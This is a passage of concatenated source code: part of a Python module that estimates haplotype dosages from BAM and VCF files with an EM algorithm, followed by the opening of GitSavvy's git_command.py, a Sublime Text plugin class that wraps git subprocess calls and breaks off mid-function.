qvoffset <33/64> : quality value offset, 33/64 depending on how quality values were encoded, default is 33\n
mbq : minimum base quality to consider a base for haplotype fragment, default 13\n
maxIS : maximum insert-size for a paired-end read to be considered as a single fragment for phasing, default 3000.\n
"""
try:
all_reads = pysam.Samfile(bamfile, 'rb')
except IOError:
raise InputError('The input BAM file was not found!')
ReadHeader = subprocess.Popen(["samtools","view","-H", bamfile], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
header, err_header = ReadHeader.communicate()
if ReadHeader.returncode!=0:
raise InputError('Failed to read the header from the bam file! Original error message:\n'+err_header)
if isinstance(header, bytes):
header=bytes.decode(header)
else:
pass
RGIDs, SMnames = [], []
for _headerline in header.splitlines(): # pasre the header of the bam file to extract the ID and SM fields of each Read Group
if _headerline[0:3]=='@RG':
RGID_added, SM_added = False, False
for _n, _field in enumerate(_headerline.split()):
if 'ID' in _field:
if not RGID_added:
RGIDs.append(''.join(_headerline.split()[_n].split(':')[1:])) # add read group ID
RGID_added = True
else:
raise InputError('Double ID fields detected in @RG header line!')
elif 'SM' in _field:
if not SM_added:
SMnames.append(''.join(_headerline.split()[_n].split(':')[1:])) # add the sample name associated with the read group ID
SM_added = True
else:
raise InputError('Double SM fields detected in @RG header line!')
if SM_added and RGID_added:
pass
elif SM_added:
raise InputError('ID field missing in @RG header line!')
elif RGID_added:
raise InputError('SM field missing in @RG header line!')
else:
raise InputError('ID and SM fields missing in @RG header line!')
if len(RGIDs)!=len(set(RGIDs)):
raise InputError('Duplicate read group IDs detected in the bam header!')
GroupedReadsWithID = [[] for _id in RGIDs] # separate reads belonging to each Read Group
for _read in all_reads:
GroupedReadsWithID[RGIDs.index(dict(_read.get_tags())['RG'])].append(_read)
GroupedReads, GroupedSM = [], [] # combine the reads with different RGID but the same SM as they are assumed to belong to the same sample
for _SMname, _ReadGroup in zip(SMnames, GroupedReadsWithID):
if _SMname not in GroupedSM:
GroupedReads.append(_ReadGroup)
GroupedSM.append(_SMname)
else:
GroupedReads[GroupedSM.index(_SMname)]+=_ReadGroup
del GroupedReadsWithID
try:
genolst = getGenotypesPop(vcffile, GroupedSM)
allelelst = getAllelesPop(vcffile, GroupedSM)
except IOError:
raise InputError('The VCF file was not found!')
except:
raise
Frag_lsts, Q_lsts = [], []
varpos = list(_x[1] for _x in allelelst)
for _group, reads in enumerate(GroupedReads):
frag_lst, q_lst = [], []
reads = sorted(reads, key= lambda _x: (_x.qname, _x.flag & 0x900)) # sort the alignments using their names, with the primary alignments being placed first.
_rnum = 0
rNUM = len(reads)
while _rnum < rNUM: # scan through the alignments to find the pairs/singles
break_mate = False
is_proper_pair = False
read = copy.deepcopy(reads[_rnum])
if read.is_unmapped or read.is_duplicate or (read.flag & 0x900): # throw away unmapped reads, duplicates and secondary/supplementary alignments
_rnum+=1
continue
try:
if read.qname == reads[_rnum+1].qname: # means the read is paired to a mate or has multiple/supplemenatry alignments
if reads[_rnum+1].is_unmapped or reads[_rnum+1].is_duplicate or (reads[_rnum+1].flag & 0x900): # if the next read is unmapped, a duplicate or not primarym: skip it
pass
else:
is_proper_pair = True # means the read is paired to a proper mate
mate = copy.deepcopy(reads[_rnum+1])
_rnum+=2
else: # means the read is single
_rnum+=1
except IndexError: # could occur for the last read in the alignments' list
_rnum+=1
if is_proper_pair:
if (max(mate.positions+read.positions)-min(mate.positions+read.positions)+1)>maxIS: # Check the maximum insert-size to consider the mates as a single fragment
break_mate = True
if read.mapping_quality >= mmq:
try:
coordinates, nucleotides, quals = list(zip(*[(_x, _y, _z) for _x, _y, _z in zip(read.positions, adjust_seq(read).upper(), list(ord(_x)-qoffset for _x in read.qual)) if _z>=mbq]))
except ValueError as e:
if e.args[0][0:len("need more than 0 values to unpack")]=="need more than 0 values to unpack" or e.args[0][0:len("not enough values to unpack")]=="not enough values to unpack":
coordinates, nucleotides, quals= [(), (), ()]
else:
raise
else:
coordinates, nucleotides, quals = [(), (), ()]
if mate.mapping_quality >= mmq:
try:
coordinates_mate, nucleotides_mate, quals_mate = list(zip(*[(_x, _y, _z) for _x, _y, _z in zip(mate.positions, adjust_seq(mate).upper(), list(ord(_x)-qoffset for _x in mate.qual)) if _z>=mbq]))
except ValueError as e:
if e.args[0][0:len("need more than 0 values to unpack")]=="need more than 0 values to unpack" or e.args[0][0:len("not enough values to unpack")]=="not enough values to unpack":
coordinates_mate, nucleotides_mate, quals_mate = [(), (), ()]
else:
raise
else:
coordinates_mate, nucleotides_mate, quals_mate = [(), (), ()]
if break_mate:
pass
else: # merge the sub-reads if the insert-size is less than maxIS
try:
coordinates, nucleotides, quals = list(zip(*sorted(zip(coordinates+coordinates_mate, nucleotides + nucleotides_mate, quals+quals_mate), key = lambda x: x[0])))
except ValueError as e:
if e.args[0][0:len("need more than 0 values to unpack")]=="need more than 0 values to unpack" or e.args[0][0:len("not enough values to unpack")]=="not enough values to unpack":
coordinates, nucleotides, quals = [(), (), ()]
else:
raise
else:
break_mate = True
if read.mapping_quality >= mmq:
try:
coordinates, nucleotides, quals = list(zip(*[(_x, _y, _z) for _x, _y, _z in zip(read.positions, adjust_seq(read).upper(), list(ord(_x)-qoffset for _x in read.qual)) if _z>=mbq]))
except ValueError as e:
if e.args[0][0:len("need more than 0 values to unpack")]=="need more than 0 values to unpack" or e.args[0][0:len("not enough values to unpack")]=="not enough values to unpack":
coordinates, nucleotides, quals = [(), (), ()]
else:
raise
else:
coordinates, nucleotides, quals = [(), (), ()]
coordinates_mate, nucleotides_mate, quals_mate = [(), (), ()]
if break_mate:
pass
else:
unique_q = []
unique_c = []
unique_n = []
for _n, _c in enumerate(coordinates): # remove the duplicates from overlapping positions
try:
if unique_c[-1]!=_c:
unique_c.append(_c)
unique_n.append(nucleotides[_n])
unique_q.append(quals[_n])
elif unique_n[-1]==nucleotides[_n]:
unique_q[-1] = min(126-qoffset, unique_q[-1]+quals[_n])
else: # if the called nucleotides differ at overlapping sites, use the one with the highest Phred score and adjust the Phred score.
if quals[_n]>unique_q[-1]:
_new_q_score = round(-10*log(1-10**(-unique_q[-1]/10)*(1-10**(-quals[_n]/10)), 10), 5) # Q=-10log(p,10)
if _new_q_score >= mbq:
unique_n[-1] = nucleotides[_n]
unique_q[-1] = _new_q_score
else:
del(unique_c[-1], unique_n[-1], unique_q[-1])
else:
_new_q_score = round(-10*log(1-(1-10**(-unique_q[-1]/10))*10**(-quals[_n]/10), 10), 5)
if _new_q_score >= mbq:
unique_q[-1] = _new_q_score
else:
del(unique_c[-1], unique_n[-1], unique_q[-1])
except IndexError:
unique_c.append(_c)
unique_n.append(nucleotides[_n])
unique_q.append(quals[_n])
coordinates, nucleotides, quals = [unique_c, unique_n, unique_q]
coordinates = list(_x+1 for _x in coordinates) # Convert the zero-based BAM coordinates to 1-based, as the coordinates are 1-based in the VCF (like the SAM format).
new_frag, new_q = frag_gen(varpos, allelelst, genolst[_group], coordinates, nucleotides, quals)
frag_lst.append(new_frag)
q_lst.append(new_q)
if break_mate:
coordinates_mate = list(_x+1 for _x in coordinates_mate)
new_frag_mate, new_q_mate = frag_gen(varpos, allelelst, genolst[_group], coordinates_mate, nucleotides_mate, quals_mate)
frag_lst.append(new_frag_mate)
q_lst.append(new_q_mate)
try:
frag_lst, q_lst = [_lst for _lst in zip(*[(_x, _y) for _x, _y in zip(frag_lst, q_lst) if not _x.isNULL()])]
except ValueError as e:
if e.args[0][0:len("need more than 0 val:ques to unpack")]=="need more than 0 values to unpack" or e.args[0][0:len("not enough values to unpack")]=="not enough values to unpack":
frag_lst, q_lst = [], []
Frag_lsts.append(frag_lst)
Q_lsts.append(q_lst)
return Frag_lsts, Q_lsts, GroupedSM
def get_haplos(bamfile, vcffile, windowsize = 3, shiftsize = 1, eps=1e-06, eps_rel=1e-04, maxit=5000, use_relative=False, maxIS=500, mbq=10, mmq=9, qoffset=33, min_cov = 4, expression=True, deterministic=False, verbose=False):
"""scan the SNPs given by vcffile, using a window of size winodwsize and window shifts of size shiftsize, and estimate haplotype frequencies for each window.
Finally, bridge the windows by starting from the leftmost window and stacking consecutive windows upon each other."""
output = []
sema, lock , Parallel = GetSemaLock(True)
threads = []
if Parallel:
manager = mpthread.Manager()
Frag_lsts, Q_lsts, Samples = get_frags(bamfile, vcffile, maxIS, mbq, mmq, qoffset)
if not Samples:
raise InputError('No sample name included in the bam header!')
alleleSet = [str(_allele) for _allele in set(_x for _y in getAllelesPop(vcffile, Samples) for _x in _y[2].values())] # obtain the set of alleles observed at all variation sites
varpos = [] # obtain the variant positions from the vcf file
ploidy = [0 for _sample in Samples]
contigs = []
with open(vcffile, 'rU') as _vcfh:
for _line in _vcfh:
if '#'!=_line.strip()[0]:
varpos.append(_line.strip().split()[1])
contigs.append(_line.strip().split()[0])
if not all(ploidy): # determine the ploidy levels of each sample
_genotype_fields = [_x.split(':')[0] for _x in _line.strip().split()[9:]]
if not all(_x=='.' for _x in _genotype_fields):
for _n, _x in enumerate(_genotype_fields):
if not ploidy[_n]:
ploidy[_n] = len(_x.split('/')) if _x!='.' else ploidy[_n]
if len(set(contigs))>1:
raise BlockException('All of the variants must be located on the same contig for phasing! Check the VCF file!')
contig = contigs[0]
if not all(ploidy):
raise BlockException('Ploidy levels could not be detected for some of the samples! Check the VCF file!')
l = len(varpos)
if Parallel:
_window_haps = [manager.list() for _start in range(0, l-windowsize+shiftsize, shiftsize)] # shiftsize must be <= windowsize-2 for informative overlapping between the windows
else:
_window_haps = [[] for _start in range(0, l-windowsize+shiftsize, shiftsize)] # ordinary lists suffice for multiple threads belonging to the same process
_index = -1
_start = -1*shiftsize
while _start<(l-windowsize):
_index+=1
_start+=shiftsize
if Parallel:
t = mpthread.Process(target=thread_func, name = "Haplotype window {0:d}".format(_index+1),
args = (sema, lock, _window_haps[_index], make_data_for_window,
varpos[_start:_start+windowsize],Frag_lsts, Q_lsts, Samples, vcffile, None, eps, eps_rel, maxit, use_relative),
kwargs = {'queue':True, 'verbose':verbose, 'maxIS':maxIS, 'mmq':mmq, 'mbq':mbq, 'qoffset':qoffset, 'expression':expression, 'varpos':varpos,
'alleles':alleleSet, 'min_cov':min_cov, 'Parallel':Parallel})
else:
t = threading.Thread(target=thread_func, name = "Haplotype window {0:d}".format(_index+1),
args = (sema, lock, _window_haps[_index], make_data_for_window,
varpos[_start:_start+windowsize],Frag_lsts, Q_lsts, Samples, vcffile, None, eps, eps_rel, maxit, use_relative),
kwargs = {'queue':True, 'verbose':verbose, 'maxIS':maxIS, 'mmq':mmq, 'mbq':mbq, 'qoffset':qoffset, 'expression':expression, 'varpos':varpos,
'alleles':alleleSet, 'min_cov':min_cov, 'Parallel':Parallel})
sema.acquire()
threads.append(t)
t.start()
for _thread in threads:
_thread.join()
if Parallel:
window_haps = [list(_lprox)[0] if len(_lprox) else [] for _lprox in _window_haps] # empty dictionaries reported when coverage is too low
else:
window_haps = [_l[0] if len(_l) else [] for _l in _window_haps] # empty dictionaries reported when coverage is too low
Haplotype_Blocks = dict()
for _sample in Samples:
_window_dics = {}
for _n, _win in enumerate(window_haps):
_window_dics[_n] = _win[_sample]
Haplotype_Blocks[_sample] = bridge_windows(_window_dics, shiftsize, windowsize, alleleSet, deterministic) # now combine the atomic windows one by one
_sample_num = -1
for _sample in Samples:
_sample_num+=1
if not deterministic:
with Capturing() as _output:
sys.stdout.write('Haplotype estimates for {}:\n'.format(_sample))
for _block_num in range(0, len(Haplotype_Blocks[_sample])):
sys.stdout.write('--->Block {0:d} on {1:s}:\n'.format(_block_num+1, contig))
_n = 0
for _H in Haplotype_Blocks[_sample][_block_num]:
_n+=1
sys.stdout.write('\tH_{0:d}: {1:s}\n\tStart: {3:d} ({5:s} bp), Stop: {4:d} ({6:s} bp), Prob H_{0:d}: {2:.5f}\n'.format(_n, ''.join(_H.GetVS()[0]), _H.GetRL(), _H.GetStart()+1, _H.GetStop()+1, varpos[_H.GetStart()], varpos[_H.GetStop()]))
sys.stdout.write('*******************\n')
sys.stdout.flush()
else:
with Capturing() as _output:
for _block_num in range(0, len(Haplotype_Blocks[_sample])):
columns = [[], []]+ [[] for _x in range(0, ploidy[_sample_num])]
sys.stdout.write('BLOCK_{0:d}_from_{1:s}bp_to_{2:s}bp\t{5:d}_SNPs\t{3:d}\t{4:d}\n'.format(_block_num+1, varpos[Haplotype_Blocks[_sample][_block_num][0].GetStart()], varpos[Haplotype_Blocks[_sample][_block_num][0].GetStop()], Haplotype_Blocks[_sample][_block_num][0].GetStart()+1, Haplotype_Blocks[_sample][_block_num][0].GetStop()+1, len(Haplotype_Blocks[_sample][_block_num][0].GetVS()[0]))) # write the header
#columns[0] = ['.' for _pos in range(0, len(Haplotype_Blocks[_sample][_block_num][0].GetVS()[0]))] # contig column in the individual solution
columns[0] = [contig for _pos in range(0, len(Haplotype_Blocks[_sample][_block_num][0].GetVS()[0]))] # contig column in the individual solution
columns[1] = [varpos[_pos] for _pos in range(Haplotype_Blocks[_sample][_block_num][0].GetStart(), Haplotype_Blocks[_sample][_block_num][0].GetStop()+1)] # variant position column in the individual solution
for _h in range(2, ploidy[_sample_num]+2):
columns[_h] = ['-' for _pos in range(Haplotype_Blocks[_sample][_block_num][0].GetStart(), Haplotype_Blocks[_sample][_block_num][0].GetStop()+1)] # initially undetermined haplotypes
_h = 2
try:
for _H in Haplotype_Blocks[_sample][_block_num]:
for _hh in range(0, int(round(_H.GetRL()*ploidy[_sample_num]))): # convert fraction dosages to integer dosages
try:
columns[_h+_hh] = _H.GetVS()[0] # write a homologue d times with d being its integer dosage
except IndexError:
sys.stderr.write("WARNING: Dubious rounding of fractional dosages to integer! Maybe better to use fractional dosages instead of the deterministic!\n")
break
_h += int(round(_H.GetRL()*ploidy[_sample_num]))
except ValueError:
sys.stderr.write("WARNING: Undefined haplotype probabilities encountered in block {0:d}, sample {1:s}!\n".format(_block_num, _sample))
if any(_h==['.' for _pos in range(0, len(Haplotype_Blocks[_sample][_block_num][0].GetVS()[0]))] for _h in columns[2:]):
sys.stderr.write("WARNING: Some of the haplotypes could not be reliably determined and are therefore missing! Maybe better to use fractional dosages instead of the deterministic!\n")
for _row in range(0, len(columns[0])):
sys.stdout.write('\t'.join(str(_col[_row]) for _col in columns)+'\n')
output.append(_output)
if not deterministic:
return output # return the log report with global haplotype markers and their dosages
else:
return {_sample:_output for _sample, _output in zip(Samples, output)} # return a dictionary with sample names as keys and determined haplotypes as values
def bridge_windows(hap_window_dics, shiftsize=1, winsize=3, alleleset=('0','1'), deterministic=False):
"""combine haplotype windows, starting from the leftmost window, using the probabilities of the possible haplotypes within each window.
If deterministic haplotypes are required, report a phasing estimate for each haplotype block (window) obtained by calculating the expected dosages from the probabilities."""
Haplo_Blocks = [] # homologues and probs estimated for each haploblock
starts = [] #start SNP position for each haploblock
stops = [] #stop SNP position for each haploblock
current_found = False
_start_win_num = -1
while not current_found:
_start_win_num+=1
try:
if not any(math.isnan(_prob) for _prob in hap_window_dics[_start_win_num].values()):
current_window = hap_window_dics[_start_win_num]
current_found = True
except IndexError:
sys.stderr.write("ERROR: No haplotype windows with proper probabilites given to bridge!\n")
return Haplo_Blocks
next_window_number = _start_win_num
current_added = False # has the current window been added to the haplotype blocks?
len_hap = len(hap_window_dics.keys())
while next_window_number < (len_hap-1): # for test, just stack windows
next_window_number += 1
next_found = False
while (not next_found) and (next_window_number < len_hap):
if not (any(math.isnan(_prob) for _prob in hap_window_dics[next_window_number].values())):
#if (stops==[]) or (next_window_number*shiftsize > stops[-1]): # this results in non-overlapping windows
if 1:
next_found = True
current_window = hap_window_dics[next_window_number] # start a new block with the next window
starts.append(next_window_number*shiftsize) # start position of the new haplotype block stored
stops.append(next_window_number*shiftsize+min(len(next(iter(current_window))), winsize)-1) # stop position of the current haplotype block stored
Haplo_Blocks.append(current_window)
else:
next_window_number+=1
else:
next_window_number+=1
Haplo_Blocks_new = []
for _n, _block in enumerate(Haplo_Blocks):
Haplo_Blocks_new.append([])
for _H in _block.keys():
# print(starts[_n], stops[_n], _H)
Haplo_Blocks_new[-1].append(Haplotypes(starts[_n], stops[_n], _block[_H], 0, None, None, _H))
return Haplo_Blocks_new
def scan_region(bamfile, vcffile, windowsize = 3, shiftsize=1, outprefix = 'scan', eps=1e-06, eps_rel=1e-04, maxit=5000, use_relative=False, maxIS=500, mbq=10, mmq=9, qoffset=33, min_cov = 4, expression = True, verbose=False):
"""scan the SNPs given by vcffile, using a window of size winodwsize. The haplotypes (expression) dosages are estimated for the SNPs in each window from the bam file and
written to a dat files for that window. Windows will slide one or more nucleotides at each scanning step according to the shiftsize (l-windowsize+1 windows in total with
shiftsize = 1 and l//windowsize+1 windows with shiftsize = windowsize)."""
output = []
sema, lock , Parallel = GetSemaLock(True)
threads = []
if Parallel:
manager = mpthread.Manager()
Frag_lsts, Q_lsts, Samples = get_frags(bamfile, vcffile, maxIS, mbq, mmq, qoffset)
if not Samples:
raise InputError('No sample name included in the bam header!')
alleleSet = [str(_allele) for _allele in set(_x for _y in getAllelesPop(vcffile, Samples) for _x in _y[2].values())] # obtain the set of alleles observed at all variation sites
varpos = [] # obtain the variant positions from the vcf file
with open(vcffile, 'rU') as _vcfh:
for _line in _vcfh:
if '#'!=_line.strip()[0]:
varpos.append(_line.strip().split()[1])
l = len(varpos)
if Parallel:
garbage = [manager.list() for _start in range(0, l-windowsize+shiftsize, shiftsize)]
else:
garbage = [[] for _start in range(0, l-windowsize+shiftsize, shiftsize)]
_index = -1
_start = -1*shiftsize
while _start<(l-windowsize):
_index+=1
_start+=shiftsize
current_varpos = varpos[_start:_start+windowsize]
if Parallel:
t = mpthread.Process(target=thread_func, name = "Haplotype window {0:d}".format(_index+1),
args = (sema, lock, garbage[_index], make_data_for_window,
current_varpos,Frag_lsts, Q_lsts, Samples, vcffile, outprefix+'_window_'+str(_index+1)+'_from_position_'+str(current_varpos[0])+'_to_position_'+str(current_varpos[-1])+'.dat', eps, eps_rel, maxit, use_relative),
kwargs = {'maxIS':maxIS, 'mbq':mbq, 'mmq':mmq, 'qoffset':qoffset, 'alleles':alleleSet, 'min_cov':min_cov, 'expression':expression,
'varpos':varpos, 'verbose':verbose, 'Parallel':Parallel})
else:
t = threading.Thread(target=thread_func, name = "Haplotype window {0:d}".format(_index+1),
args = (sema, lock, garbage[_index], make_data_for_window,
current_varpos,Frag_lsts, Q_lsts, Samples, vcffile, outprefix+'_window_'+str(_index+1)+'_from_position_'+str(current_varpos[0])+'_to_position_'+str(current_varpos[-1])+'.dat', eps, eps_rel, maxit, use_relative),
kwargs = {'maxIS':maxIS, 'mbq':mbq, 'mmq':mmq, 'qoffset':qoffset, 'alleles':alleleSet, 'min_cov':min_cov, 'expression':expression,
'varpos':varpos, 'verbose':verbose, 'Parallel':Parallel})
sema.acquire()
threads.append(t)
t.start()
for _thread in threads:
_thread.join()
def make_data_for_window(window,Frag_lsts, Q_lsts, Samples, vcffile, outfile = None, eps = 1e-06, eps_rel = 1e-04, maxit=1000, use_relative= False, maxIS=500, mbq=10, mmq=9, qoffset=33, alleles = ('0','1'), min_cov = 4, expression = True, varpos = None, queue = False, verbose=False, Parallel=False):
"""Gets SNP-fragments and then generates a data frame: sample names are the rows and the dosages of
each windowed haplotype are stored in the columns. Window gives SNP positions to be included in the windowed haplotype
as a list. Assuming bi-allelic SNPs (0/1), 2**len(window) haplotypes will be possible the dosage of each is determined
from the SNP-fragments. The results will be written to the given outfile or to standard output."""
if not outfile:
outhandel = sys.stdout
else:
outhandel = open(outfile, 'w')
if not varpos:
varpos = []
with open(vcffile, 'rU') as _vcfh:
for _line in _vcfh:
if '#'!=_line.strip()[0]:
varpos.append(_line.strip().split()[1])
window = {varpos.index(str(_base)): _winpos for _winpos, _base in enumerate(window)}
all_haplos = [_winhaplo for _winhaplo in itertools.product(*[alleles for _winpos in range(0,len(window))])] # all of the haplotypes possible in the window
if not queue:
garbage = outhandel.write("Sample"+'\t'+'\t'.join('H_'+''.join(_haplo) for _haplo in all_haplos)+'\n') #write the header for the data frame file
l = len(window) # length of the haplotypes (just equal to the size of the SNP scanning window)
N = len(all_haplos) # number of the haplotypes
norm = 1.
if queue:
Outqueue = OrderedDict()
else:
Outqueue = None
for _sn, _sample in enumerate(Samples): # initialize the EM-algorithm and set once and for all the compatibility matrix
to_delete = [] # delete SNP-fragments that do not overlap with the current window
coverage = len(Frag_lsts[_sn]) # total number of reads for sample _sn
Matrix = [[0 for _j in range(0, N)] for _i in range(0,coverage)] # compatibility matrix for the reads (_i) vs haplotypes (_j) for sample _sn
sample_haplo_dict = OrderedDict({_h:1./N for _h in all_haplos}) # Ordered dictionary to store the dosages of the window haplotypes for each sample
for _i in range(0, len(Frag_lsts[_sn])):
_SNP_frag = Frag_lsts[_sn][_i].GetDict() # get the dictionary corresponding to the SNP-fragment (throwing '-' alleles away)
_overlap = set(window.keys()) & set(_SNP_frag.keys()) # set of SNP positions common between the SNP-fragment and the current window
if not _overlap: # if no overlap with the window
to_delete.append(_i)
else:
_j = -1
for _h in sample_haplo_dict.keys(): # for each read, detect window haplotypes compatible with that read
_j+=1
_read_belongs_2_hap = True
for _base in _overlap:
if _SNP_frag[_base]!=_h[window[_base]]:
_read_belongs_2_hap = False
break
if _read_belongs_2_hap:
Matrix[_i][_j] = 1
Frag_lsts[_sn] = np.delete(Frag_lsts[_sn], to_delete, axis= None).tolist()
Matrix = np.delete(Matrix, to_delete, axis=0)
sample_haplo_dict = EM(sample_haplo_dict, Matrix, l, eps, eps_rel, maxit, min_cov, use_relative=use_relative, verbose=verbose) #, 1e-12, use_relative = True)
if expression:
norm = 1.
else: # normalize the haplotype specific expression rates to obtain haplotype dosages if the data is genomic, i.e. NOT RNA-seq expression data
norm = sum(sample_haplo_dict[_haplo] for _haplo in all_haplos)
if queue:
output = OrderedDict()
for _haplo in all_haplos:
output[_haplo] = sample_haplo_dict[_haplo]/norm
Outqueue[_sample] = output
else:
garbage = outhandel.write(_sample+'\t'+'\t'.join("{0:.3f}".format(sample_haplo_dict[_haplo]/norm) for _haplo in all_haplos)+'\n')
if Parallel or outfile: # close stdout descriptor in case several processes are run or close the outfile handle in case output is given
try:
os.close(outhandel.fileno())
except:
pass
return Outqueue
def EM(haplo_dict, M, l, eps = 1e-06, eps_rel = 1e-04, itermax = 1000, min_cov = 4, use_relative=False, verbose = True):
""" EM algorithm to obtain haplotype frequencies, using the NGS reads that cover a region and the initial Poisson rates
for the hidden haplotypes (given in sample_haplo_dict). Absolute convergence test is used with eps value unless use_relative
is set True in which case relative (less stric with log kernel) convergence is tested with eps_rel.
Q(R|U) = E[log(poisson(k_1|lu_1)*poisson(k_2|lu_2)*...*poisson(k_N|lu_N))] =
E[log(exp(-l*u_1)*(l*u_1)**k_1/k_1! * exp(-l*u_2)*(l*u_2)**k_2/k_2! *...* exp(-l*u_N)*(l*u_N)**k_N/k_N!)] =
E[-l*u_1 + k_1*(log(l)+log(u_1)) - log(k_1!)+
-l*u_2 + k_2*(log(l)+log(u_2)) - log(k_2!)+
...
-l*u_N + k_N*(log(l)+log(u_N)) - log(k_N!)] =
-l*(u_1+u_2+...+u_N) + c*log(l) + sum(E[k_i|U]*log(u_i) for i in 1,2,...,N) - sum(log(E[k_i|U]!) for i in 1,2,...N)
=> Q(R|U) = -l*(u_1+u_2+...+u_N) + sum(E[k_i|U]*log(u_i) for i in 1,2,...,N) - sum(log(E[k_i|U]!) for i in 1,2,...N) => u_i = E[k_i|U]/l (Maximization)
E(k_i|U) obtained from the expectation step."""
process_name = mpthread.current_process().name
thread_name = threading.current_thread().name
converged = False # convergence not reached
iteration = 1 # current iteration
c = len(M) # total read count for the region
if c < min_cov:
sys.stderr.write('[{0:s}:{1:s}] ERROR: Coverage was too low to estimate haplotypes!\n'.format(process_name, thread_name))
for _key in haplo_dict.keys():
haplo_dict[_key] = float('NaN')
return haplo_dict
while (not converged and iteration<=itermax):
count_haplo_dict = get_expectation(haplo_dict, M) # Expectation (E) step
log_count = np.log([_u for _u in haplo_dict.values()])
valid_haps = [_n for _n in range(0, len(haplo_dict.values())) if not (math.isnan(log_count[_n]) or math.isinf(log_count[_n]))]
current_kernel = -l*sum(haplo_dict.values()[_n] for _n in valid_haps) + np.dot([count_haplo_dict.values()[_n] for _n in valid_haps], [log_count[_n] for _n in valid_haps]) - sum(logfact(count_haplo_dict.values()[_n]) for _n in valid_haps) #current kernel value
new_haplo_dict = OrderedDict()
for _h in haplo_dict.keys(): #maximization (M) step
new_haplo_dict[_h] = count_haplo_dict[_h]/float(l)
new_count_haplo_dict = get_expectation(new_haplo_dict, M)
new_log_count = np.log([_u for _u in new_haplo_dict.values()])
new_valid_haps = [_n for _n in range(0, len(new_haplo_dict.values())) if not (math.isnan(new_log_count[_n]) or math.isinf(new_log_count[_n]))]
new_kernel = -l*sum(new_haplo_dict.values()[_n] for _n in new_valid_haps) + np.dot([new_count_haplo_dict.values()[_n] for _n in new_valid_haps], [new_log_count[_n] for _n in new_valid_haps]) - sum(logfact(new_count_haplo_dict.values()[_n]) for _n in new_valid_haps) #update kernel value
diff = new_kernel - current_kernel
if diff<0 and verbose:
sys.stderr.write("[{1:s}:{2:s}] WARNING: likelihood decreased at EM iteration {0:d}!\n".format(iteration, process_name, thread_name))
if not use_relative:
converged = abs(diff) < eps
else:
converged = float(diff)/abs(max(new_kernel, current_kernel)) < eps_rel
haplo_dict = OrderedDict()
for _key in new_haplo_dict.keys():
haplo_dict[_key] = new_haplo_dict[_key]
iteration+=1
if verbose and not converged:
sys.stderr.write("[{1:s}:{2:s}] WARNING: convergence NOT acheived after {0:d} iterations!\n".format(itermax, process_name, thread_name))
elif verbose:
sys.stderr.write("[{1:s}:{2:s}] Convergence achieved at {0:d}'th iteration!\n".format(iteration-1, process_name, thread_name))
if verbose and not use_relative:
sys.stderr.write("[{1:s}:{2:s}] Absolute difference in log likelihood at termination: {0:5.4e}\n".format(diff, process_name, thread_name))
elif verbose:
sys.stderr.write("[{1:s}:{2:s}] Relative difference in log likelihood at termination: {0:5.4e}\n".format(float(diff)/abs(max(new_kernel, current_kernel)), process_name, thread_name))
return haplo_dict
def logfact(n):
"""calculate the log factorial function in a way to avoid overflow."""
global logfactorial_table
if n<1000.5:
return logfactorial_table[round(n)]
else:
return (n-1/2)*log(n)-n+(1/2)*log(2*math.pi)+1/(12*n) # approximate by Gamma function
|
git_command.py
|
"""
Define a base command class that:
1) provides a consistent interface with `git`,
2) implements common git operations in one place, and
3) tracks file- and repo- specific data the is necessary
for Git operations.
"""
import os
import subprocess
import shutil
import re
import threading
import traceback
import sublime
from ..common import util
from .git_mixins.status import StatusMixin
from .git_mixins.active_branch import ActiveBranchMixin
from .git_mixins.branches import BranchesMixin
from .git_mixins.stash import StashMixin
from .git_mixins.stage_unstage import StageUnstageMixin
from .git_mixins.checkout_discard import CheckoutDiscardMixin
from .git_mixins.remotes import RemotesMixin
from .git_mixins.ignore import IgnoreMixin
from .git_mixins.tags import TagsMixin
from .git_mixins.history import HistoryMixin
from .git_mixins.rewrite import RewriteMixin
from .git_mixins.merge import MergeMixin
from .exceptions import GitSavvyError
from .settings import SettingsMixin
import time
git_path = None
error_message_displayed = False
UTF8_PARSE_ERROR_MSG = (
"GitSavvy was unable to parse Git output as UTF-8. Would "
"you like to use the fallback encoding specified in GitSavvy "
"settings? Text may not appear as expected."
)
FALLBACK_PARSE_ERROR_MSG = (
"The Git command returned data that unparsable. This may happen "
"if you have checked binary data into your repository. The current "
"operation has been aborted."
)
GIT_TOO_OLD_MSG = "Your Git version is too old. GitSavvy requires {:d}.{:d}.{:d} or above."
# git minimum requirement
GIT_REQUIRE_MAJOR = 1
GIT_REQUIRE_MINOR = 9
GIT_REQUIRE_PATCH = 0
class LoggingProcessWrapper(object):
"""
Wraps a Popen object with support for logging stdin/stderr
"""
def __init__(self, process, timeout):
self.timeout = timeout
self.process = process
self.stdout = b''
self.stderr = b''
def read_stdout(self):
try:
for line in iter(self.process.stdout.readline, b""):
self.stdout = self.stdout + line
util.log.panel_append(line.decode())
except IOError as err:
util.log.panel_append(err)
def read_stderr(self):
try:
for line in iter(self.process.stderr.readline, b""):
self.stderr = self.stderr + line
util.log.panel_append(line.decode())
except IOError as err:
util.log.panel_append(err)
def communicate(self, stdin):
"""
Emulates Popen.communicate
Writes stdin (if provided)
Logs output from both stdout and stderr
Returns stdout, stderr
"""
if stdin is not None:
self.process.stdin.write(stdin)
self.process.stdin.flush()
self.process.stdin.close()
stdout_thread = threading.Thread(target=self.read_stdout)
stdout_thread.start()
stderr_thread = threading.Thread(target=self.read_stderr)
stderr_thread.start()
self.process.wait()
stdout_thread.join(self.timeout / 1000)
stderr_thread.join(self.timeout / 1000)
return self.stdout, self.stderr
class GitCommand(StatusMixin,
ActiveBranchMixin,
BranchesMixin,
StashMixin,
StageUnstageMixin,
CheckoutDiscardMixin,
RemotesMixin,
IgnoreMixin,
TagsMixin,
HistoryMixin,
RewriteMixin,
MergeMixin,
SettingsMixin
):
"""
Base class for all Sublime commands that interact with git.
"""
_last_remotes_used = {}
def git(self, *args,
stdin=None,
working_dir=None,
show_panel=False,
throw_on_stderr=True,
decode=True,
encode=True,
stdin_encoding="UTF-8",
custom_environ=None):
"""
Run the git command specified in `*args` and return the output
of the git command as a string.
If stdin is provided, it should be a string and will be piped to
the git process. If `working_dir` is provided, set this as the
current working directory for the git process; otherwise,
the `repo_path` value will be used.
"""
args = self._include_global_flags(args)
command = (self.git_binary_path, ) + tuple(arg for arg in args if arg)
command_str = " ".join(command)
show_panel_overrides = self.savvy_settings.get("show_panel_for")
show_panel = show_panel or args[0] in show_panel_overrides
close_panel_for = self.savvy_settings.get("close_panel_for") or []
if args[0] in close_panel_for:
